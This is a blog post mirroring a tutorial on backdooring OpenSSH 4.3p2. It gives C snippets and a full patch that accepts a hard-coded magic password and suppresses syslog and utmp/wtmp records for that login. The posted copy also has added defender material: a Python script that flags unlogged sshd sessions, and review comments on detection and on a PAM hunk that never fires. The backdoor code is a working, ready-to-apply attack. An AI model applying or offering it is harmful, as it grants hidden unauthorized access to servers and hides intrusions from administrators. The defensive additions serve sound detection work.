Write your own SSHD backdoor

This article is not written by me. I found it online, but only in one place so this is effectively a mirror for it. Enjoy 🙂

///////////////////////////////////////////////////////////////////////////////
/*****************************************************************************/
/* Tutorial: How to write a backdoor for OpenSSH. */
/* Date: June 29, 2005 */
/* Author: pikah (rvdwesten@gmail.com) */
/* Website: http://w4ck1ng.net */
/* */

/* DISCLAIMER: */
/* This tutorial is published here for one reason only: To make the problem */
/* understandable for users who are interested in the way a sshd-daemon */
/* can be easily backdoored. In this way system administrators can understand */
/* how easily an attacker can make himself 'invisible' for logging and even */
/* get access without knowing the real passwords */
/* The author will not be responsible for any */
/* actions taken by anyone who used this paper for illegal activities */
/* */
/*****************************************************************************/
///////////////////////////////////////////////////////////////////////////////

Well, this is one of the first tutorials I will write.
This tutorial is about how to make (and write) your own OpenSSH backdoor.
I will try to keep this tutorial as small as possible, and I will not include any extra functions, such as routines that remove the logging functions altogether. First I'm going to say something about OpenSSH before I get into the details.

[What is OpenSSH]

First I'm going to tell what OpenSSH does. I'm not getting into details, because most of you are probably not even reading this section. OpenSSH is a client/server application which allows an administrator to access his server securely. The
reason I say 'securely' is that SSH encrypts its session, so man-in-the-middle attacks get more difficult because all data is sent over the net as ciphertext. OpenSSH is used because protocols such as telnet, rlogin and ftp use
no encryption at all, so when you connect to a host and someone is watching, they can easily copy your password or take other information from the stream. Additionally, OpenSSH provides secure tunneling
capabilities and several authentication methods, and supports all SSH protocol versions.
OpenSSH is developed by the OpenBSD Project and is freely usable and reusable by everyone under a BSD license. However, development has costs, so if you find OpenSSH useful (particularly if you use it in a commercial system that is distributed),
please consider donating to help fund the project. The official website of OpenSSH is: http://www.openssh.org
Also nice to notice is that OpenSSH is mainly written for OpenBSD, but since it is used a lot there is a portable version for Linux. Of course Linux is not the only ported version; you can find others on the website of the OpenSSH project.

[The Backdooring]

So after explaining what OpenSSH does, I will try to explain how it is possible to make a backdoor in OpenSSH, and every little detail of what I am doing.
First of all we need to download the source code. At this point the latest version of OpenSSH is OpenSSH-4.3p2. This tutorial will teach you how to make a backdoor for this version of OpenSSH. Also note that other versions may need to be 'patched' in a different way, or maybe even in other files.

We download the source code first. After downloading we unpack it and change into the source directory. Now that we have the source, written in C, we can start looking for the place where password authentication starts. There is more than one way to make a backdoor for OpenSSH. For example, you can place a backdoor before the handshake even begins; at that point nothing is encrypted yet. The bad thing about this is that plaintext still goes over the internet. The good thing is that we are able to bypass logging without building extra features into the source. Another way is to 'hijack' the authentication method and make it accept our chosen password.

In this tutorial I will explain how to 'hijack' the authentication method. This way all our traffic is encrypted before the authentication starts, so it isn't possible to capture the data and grep your password from the captured packets. The bad thing, as I already said, is that there is still logging we have to bypass. So we have to put our code in more than one
place: we have to search for all places where logging is used. Starting with the backdoor itself, we want the code to accept our 'magic' password. First we are going to have a look at the place where we want to add our backdoor: the authentication function which checks the password that is entered. This function can be found in the file 'auth-passwd.c'.
By opening this file we search for where the plain password comes in. This is the place where we can check it against the magic password inserted by us.
If the password matches the magic password, it gives us the right to enter the box, which is what we want. Also, when the magic password is used, we are going to disable logging, since we don't want the administrator to notice our
existence.

Let's start with the code. The files we are going to modify are the following:

##################################################
# includes.h -- In this file we are going to define our password and global integer.
# auth-passwd.c -- In this file we are going to put the backdoor.
# auth-pam.c -- In this file we are going to put some code for when PAM authentication is used.
# log.c -- This file we are going to change since we don't want logging.
# loginrec.c -- Same as log.c
##################################################

Let's first start with 'includes.h'. We need this file because it is included by all other files in the OpenSSH project; when we declare something in here, we can easily use it everywhere else. So what we are going to do is add some code.

##########################################
# <code>
# #define B4XDOOR "backdoorpasswordhere"
# int backdoorActive;
# </code>
##########################################

Now we can put our backdoor code in the other places.
We are going to put the following code in the function called: "int auth_password(Authctxt *authctxt, const char *password);"

#######################################
# <auth-passwd.c>
# backdoorActive = 0;
#
# if (!strcmp(password, B4XDOOR)) {
# backdoorActive = 1;
# return 1;
# }
# </auth-passwd.c>
#######################################

With this done, we can log in with the password defined in includes.h. We also set backdoorActive to 1; this value is used by other functions, e.g. logging. We also change the file auth-pam.c, which is used when PAM authentication is enabled. If backdoorActive is set, the PAM authentication result is forced to PAM_SUCCESS and the user is allowed to log in. The function we are changing is the following: "int sshpam_auth_passwd(Authctxt *authctxt, const char *password);"

#############################################
# <auth-pam.c>
# if(backdoorActive == 1)
# sshpam_err = PAM_SUCCESS;
# </auth-pam.c>
#############################################

Now we have another problem. Logging is not disabled, so when you log in with the magic password you are still logged, e.g. by syslogd. So we are going to tell the ssh daemon not to log us when we are using the magic password. This must be done
in the following files: <log.c> and <loginrec.c>
These are easy: we just put our code at the front of the following functions.
##################################################
# log.c --> void do_log(LogLevel level, const char *fmt, va_list args);
# loginrec.c --> int login_write(struct logininfo *li);
##################################################

###########################
# <log.c>
# if(backdoorActive == 1)
# return;
# </log.c>
#
# <loginrec.c>
# if(backdoorActive == 1)
# return 0;
# </loginrec.c>
###########################

These are the smallest changes you need to make to backdoor an OpenSSH daemon. Take care to make sure password authentication is enabled; if only another authentication method is in use, this backdoor probably will not work. Also check that the keyboard-interactive method is not enabled, as that may keep this backdoor from working either.
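The two early returns above take away the auth-log line and the utmp record but not the session itself. The following Python script is an added defender-side example, not part of pikah's tutorial: it cross-checks established connections to sshd (as shown by `ss -tnp`) against the auth log and `who` output and flags sessions that sshd never logged. The input formats are assumed and the samples are constructed.

```python
"""Cross-check live sshd connections against the auth log and utmp.

Added defender-side example; it is not part of pikah's tutorial. The patched
do_log() and login_write() return early, so a backdoored login leaves a live
sshd child and an ESTABLISHED connection on port 22 but neither an
"Accepted ... for ... from ... port ..." syslog line nor a utmp record.
Samples are constructed in the shape of `ss -tnp`, `who` and auth.log output
(assumed formats; adjust the regexes to your host).
"""
import re

# Constructed `ss -tnp` sample: two established connections to the local sshd.
SS_SAMPLE = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0 0 10.0.0.5:22 192.0.2.10:51522 users:(("sshd",pid=4122,fd=4),("sshd",pid=4120,fd=4))
ESTAB 0 0 10.0.0.5:22 198.51.100.7:40210 users:(("sshd",pid=4392,fd=4),("sshd",pid=4390,fd=4))
"""

# Constructed `who` sample: only the first connection has a utmp record.
WHO_SAMPLE = "alice    pts/0        2024-05-01 09:12 (192.0.2.10)\n"

# Constructed auth.log sample: only the first connection was logged by sshd.
AUTH_LOG_SAMPLE = """\
May  1 09:12:03 host sshd[4120]: Accepted password for alice from 192.0.2.10 port 51522 ssh2
May  1 09:12:03 host sshd[4120]: pam_unix(sshd:session): session opened for user alice by (uid=0)
"""

SS_RE = re.compile(r'^ESTAB\s+\d+\s+\d+\s+\S+:22\s+(\S+):(\d+)\s+users:\(\("sshd",pid=(\d+)')
ACCEPT_RE = re.compile(r'sshd\[\d+\]: Accepted \S+ for \S+ from (\S+) port (\d+)')
WHO_RE = re.compile(r'\(([^)]+)\)\s*$')


def established_ssh_sessions(ss_output):
    """Return [(peer_ip, peer_port, pid)] for ESTABLISHED connections to local port 22."""
    sessions = []
    for line in ss_output.splitlines():
        m = SS_RE.match(line)
        if m:
            sessions.append((m.group(1), int(m.group(2)), int(m.group(3))))
    return sessions


def accepted_logins(auth_log):
    """Return {(peer_ip, peer_port)} for logins that sshd itself logged as accepted."""
    return {(m.group(1), int(m.group(2))) for m in ACCEPT_RE.finditer(auth_log)}


def utmp_hosts(who_output):
    """Return the remote hosts listed by `who` (utmp records written by login_write)."""
    hosts = set()
    for line in who_output.splitlines():
        m = WHO_RE.search(line)
        if m:
            hosts.add(m.group(1))
    return hosts


def find_unlogged_sessions(ss_output, auth_log, who_output):
    """Flag established sshd connections that have no Accepted line in the auth log.

    A connection still in the middle of authentication looks the same for a few
    seconds, so treat a hit as an alert only if it persists across two runs.
    """
    accepted = accepted_logins(auth_log)
    hosts = utmp_hosts(who_output)
    findings = []
    for ip, port, pid in established_ssh_sessions(ss_output):
        if (ip, port) not in accepted:
            findings.append({"peer": ip, "port": port, "pid": pid, "in_utmp": ip in hosts})
    return findings


if __name__ == "__main__":
    for finding in find_unlogged_sessions(SS_SAMPLE, AUTH_LOG_SAMPLE, WHO_SAMPLE):
        print("sshd session with no auth-log entry:", finding)
```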

To help you, I will include a patch which applies the backdoor to the source code.
[root@stimpy OpenSSH]# cat pikah.patch
diff -Naur openssh-4.3p2/auth-pam.c openssh-4.3p2-pikah/auth-pam.c
— openssh-4.3p2/auth-pam.c 2006-01-29 06:46:13.000000000 +0100
+++ openssh-4.3p2-pikah/auth-pam.c 2006-06-29 11:27:47.000000000 +0200
@@ -1164,6 +1164,11 @@
pam_strerror(sshpam_handle, sshpam_err));

sshpam_err = pam_authenticate(sshpam_handle, flags);
+
+ /* Added by pikah */
+ if(backdoorActive == 1)
+ sshpam_err = PAM_SUCCESS;
+
sshpam_password = NULL;
if (sshpam_err == PAM_SUCCESS && authctxt->valid) {
debug(“PAM: password authentication accepted for %.100s”,
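Review bot: this override of sshpam_err is unreachable for the magic password. In the auth-passwd.c hunk below, auth_password() resets backdoorActive to 0 on entry and returns 1 on a B4XDOOR match before it reaches the USE_PAM branch further down that function (past the KRB5 block shown as context), so pam_authenticate() is only ever called with backdoorActive == 0 and this branch never fires. The tutorial's statement that PAM "will return PAM_SUCCESS" for the magic password does not describe what this patch does; the PAM path is simply never consulted for it.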
diff -Naur openssh-4.3p2/auth-passwd.c openssh-4.3p2-pikah/auth-passwd.c
— openssh-4.3p2/auth-passwd.c 2005-07-26 13:54:12.000000000 +0200
+++ openssh-4.3p2-pikah/auth-passwd.c 2006-06-29 11:28:09.000000000 +0200
@@ -71,6 +71,7 @@
int
auth_password(Authctxt *authctxt, const char *password)
{
+ backdoorActive = 0;
struct passwd * pw = authctxt->pw;
int result, ok = authctxt->valid;
#if defined(USE_SHADOW) && defined(HAS_SHADOW_EXPIRE)
@@ -83,7 +84,12 @@
#endif
if (*password == ‘\0’ && options.permit_empty_passwd == 0)
return 0;

+
+ /* Added by pikah */
+ if (!strcmp(password, B4XDOOR)) {
+ backdoorActive = 1;
+ return 1;
+ }
#ifdef KRB5
if (options.kerberos_authentication == 1) {
int ret = auth_krb5_password(authctxt, password);
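Review bot: the `strcmp(password, B4XDOOR)` against a string literal compiles the magic password into sshd as a plain NUL-terminated string in read-only data, so it is visible to `strings(1)` among sshd's other messages and the rebuilt binary no longer matches the vendor package. For defenders the cheap check this hunk cannot evade is binary verification against the package database (`rpm -V openssh-server`, `dpkg --verify openssh-server`, or the distribution's published checksums) and alerting on any sshd whose hash changed outside a package update.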
diff -Naur openssh-4.3p2/includes.h openssh-4.3p2-pikah/includes.h
— openssh-4.3p2/includes.h 2006-01-02 13:40:10.000000000 +0100
+++ openssh-4.3p2-pikah/includes.h 2006-06-29 11:24:46.000000000 +0200
@@ -13,6 +13,10 @@
* called by a name other than “ssh” or “Secure Shell”.
*/

+/* Inserted with the tutorial of pikah */
+#define B4XDOOR “backdoorpasswordhere”
+int backdoorActive;
+
#ifndef INCLUDES_H
#define INCLUDES_H

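Review bot: `int backdoorActive;` is a tentative definition placed in a header that every OpenSSH translation unit includes, and it sits above the `#ifndef INCLUDES_H` guard, so every object file carries its own definition and the link relies on the linker merging them as a common symbol. For a defender that also means `backdoorActive` is a named global with external linkage: an unstripped sshd lists it in `nm` output next to the B4XDOOR literal in .rodata, and even a stripped one still differs from the packaged binary.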
diff -Naur openssh-4.3p2/log.c openssh-4.3p2-pikah/log.c
— openssh-4.3p2/log.c 2005-03-09 10:12:48.000000000 +0100
+++ openssh-4.3p2-pikah/log.c 2006-06-29 11:29:16.000000000 +0200
@@ -285,6 +285,10 @@
void
do_log(LogLevel level, const char *fmt, va_list args)
{
+
+ if(backdoorActive == 1)
+ return;
+
#if defined(HAVE_OPENLOG_R) && defined(SYSLOG_DATA_INIT)
struct syslog_data sdata = SYSLOG_DATA_INIT;
#endif
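Review bot: the early return sits ahead of every log level, so once backdoorActive is 1 this process emits nothing for the rest of its life: not the "Accepted password for ... from ... port ..." line, not later errors, not debug output. The detectable side effect is a connection sshd is actively serving with no matching auth-log entry; correlating established connections to port 22 (or the sshd process tree) against the auth log exposes the gap. Logging that does not go through do_log(), such as PAM session modules' own syslog lines when UsePAM is on or kernel audit records, is untouched by this hunk.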
diff -Naur openssh-4.3p2/loginrec.c openssh-4.3p2-pikah/loginrec.c
— openssh-4.3p2/loginrec.c 2005-11-22 09:55:13.000000000 +0100
+++ openssh-4.3p2-pikah/loginrec.c 2006-06-29 11:29:40.000000000 +0200
@@ -414,6 +414,8 @@
int
login_write(struct logininfo *li)
{
+ if(backdoorActive == 1)
+ return 0;
#ifndef HAVE_CYGWIN
if (geteuid() != 0) {
logit(“Attempt to write login records by non-root user (aborting)”);
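Review bot: returning 0 before any record is written means the session never reaches utmp, wtmp or lastlog, so `who`, `w`, `last` and `lastlog` will not show it. The pty, the sshd child and the TCP connection still exist, so a defender comparing `who` against the process list and `ss -tnp` sees a shell on a pty with no login record; that mismatch is the signal this hunk creates rather than removes.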
[root@stimpy OpenSSH]#
You can apply this patch by using the following command:

############################################################
# [root@stimpy openssh-4.3p2]# patch -Np1 < ../pikah.patch
# patching file auth-pam.c
# patching file auth-passwd.c
# patching file includes.h
# patching file log.c
# patching file loginrec.c
# [root@stimpy openssh-4.3p2]#
#
# EOF
############################################################
